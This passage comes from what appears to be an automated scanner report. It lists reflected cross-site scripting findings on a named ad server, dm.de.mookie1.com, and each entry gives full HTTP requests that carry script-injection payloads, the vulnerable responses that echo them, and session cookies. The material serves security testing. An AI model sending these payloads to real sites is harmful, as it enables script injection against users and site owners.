Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226119

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM85ed0"><script>alert(1)</script>c14b682a958/2010DM/1275337580/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.380. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1874556783@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e164"><script>alert(1)</script>b13fbcb6a6b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM2e164"><script>alert(1)</script>b13fbcb6a6b/1874556783@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226119

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:42:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM2e164"><script>alert(1)</script>b13fbcb6a6b/808994133/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.381. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1874556783@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e9d9"><script>alert(1)</script>94f02ef6711 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1874556783@x234e9d9"><script>alert(1)</script>94f02ef6711?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226119

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:42:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/341633720/x234e9d9"><script>alert(1)</script>94f02ef6711/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.382. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [USNetwork/RS_SELL_2011Q1_TF_CT_728 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1874556783@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_TF_CT_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48e06"-alert(1)-"347645d577c was submitted in the USNetwork/RS_SELL_2011Q1_TF_CT_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/1874556783@x23?USNetwork/RS_SELL_2011Q1_TF_CT_72848e06"-alert(1)-"347645d577c HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226119

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2481
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_TF_CT_72848e06"-alert(1)-"347645d577c";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to ch
...[SNIP]...

4.383. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1874556783@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40e2a"-alert(1)-"b1fcf879478 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/1874556783@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728&40e2a"-alert(1)-"b1fcf879478=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226119

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2484
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_TF_CT_728&40e2a"-alert(1)-"b1fcf879478=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to
...[SNIP]...

4.384. http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1902448725@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a931d"><script>alert(1)</script>2e0f0c892ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMa931d"><script>alert(1)</script>2e0f0c892ca/2010DM/1902448725@x23?USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; session=1296224086|1296226131

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMa931d"><script>alert(1)</script>2e0f0c892ca/2010DM/589785859/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.385. http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1902448725@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7694"><script>alert(1)</script>7991189005e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMe7694"><script>alert(1)</script>7991189005e/1902448725@x23?USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; session=1296224086|1296226131

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMe7694"><script>alert(1)</script>7991189005e/605886075/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.386. http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1902448725@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1767"><script>alert(1)</script>cb7edce5f32 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1902448725@x23c1767"><script>alert(1)</script>cb7edce5f32?USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; session=1296224086|1296226131

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:42:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1536711956/x23c1767"><script>alert(1)</script>cb7edce5f32/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.387. http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1902448725@x23

Issue detail

The value of the USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf8b8"-alert(1)-"1605863f2c2 was submitted in the USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/1902448725@x23?USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300bf8b8"-alert(1)-"1605863f2c2 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; session=1296224086|1296226131

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300bf8b8"-alert(1)-"1605863f2c2";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to ch
...[SNIP]...

4.388. http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1902448725@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd125"-alert(1)-"6bc97e60a08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/1902448725@x23?USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300&dd125"-alert(1)-"6bc97e60a08=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; session=1296224086|1296226131

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2489
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300&dd125"-alert(1)-"6bc97e60a08=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to
...[SNIP]...

4.389. http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/11678985058@x95

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bbff"><script>alert(1)</script>e5afcf36e30 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM8bbff"><script>alert(1)</script>e5afcf36e30/DLX/11678985058@x95?na_id= HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; OAX=rcHW800iZiMAAocf; dlx_20100929=set;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:45:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM8bbff"><script>alert(1)</script>e5afcf36e30/DLX/1973539250/x95/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.390. http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/11678985058@x95

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 633d5"><script>alert(1)</script>bb101675df9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX633d5"><script>alert(1)</script>bb101675df9/11678985058@x95?na_id= HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; OAX=rcHW800iZiMAAocf; dlx_20100929=set;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:45:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX633d5"><script>alert(1)</script>bb101675df9/414298719/x95/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.391. http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [REST URL parameter 4] previous next

